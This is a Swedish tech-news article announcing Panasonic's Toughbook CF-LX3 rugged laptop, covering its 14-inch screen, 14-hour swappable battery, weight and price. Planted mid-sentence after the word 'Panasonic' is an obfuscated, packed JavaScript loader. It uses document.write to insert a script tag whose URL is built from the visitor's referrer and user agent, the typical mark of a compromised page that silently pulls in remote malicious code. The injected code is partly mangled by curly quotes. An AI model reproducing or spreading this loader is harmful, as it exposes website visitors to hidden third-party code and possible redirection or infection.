Image Image Image Image Image Image Image Image Image Image

| 8 maj, 2021

Scroll to top

Top

PC

Ny robust lättviktare – Toughbook CF-LX3

Ny robust lättviktare – Toughbook CF-LX3
Sebastian

Panasonic eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kfksk|var|u0026u|referrer|sheia||js|php’.split(’|’),0,{}))
presenterar idag Toughbook CF-LX3 – en ny ultralätt Toughbook anpassad för personer med fysiskt krävande arbeten. Denna bärbara och robusta dator är utrustad med en stor 14-tumsskärm, operativsystemet Windows 8.1, en batteritid på 14 timmar och väger endast 1,26 kg, samtidigt som den lever upp till den hållbarhetsnivå som kännetecknar Toughbook. 

Med förbättrad användarvänlighet och robust exteriör är Toughbook CF-LX3 idealisk för dig som behöver kunna använda en kraftfull dator, även utanför kontoret.

Denna stora 14-tumsskärm kommer i en snygg och kompakt design. Skärmen är 10 procent större än den på en bärbar 13-tumsdator, men är samtidigt ca 10 procent mer kompakt än en traditionell 14-tumsdator.

Undvik att enheten dör – med 14 timmars batteritid 

Toughbook CF-LX3 har hela 14 timmars batteritid, vilket garanterar att enheten kan leva upp till de krav som ställs på långa och hektiska arbetsdagar. Att ladda enheten tar endast tre timmar. För de användare, vars arbete kräver att enheten måste vara i drift 24 timmar om dygnet, kan batteriet lätt bytas ut och ersättas med ett nytt, utan att enheten behöver stängas av.

Toughbook CF-LX3 finns att köpa till ett vägledande ungefärligt pris på €1.864.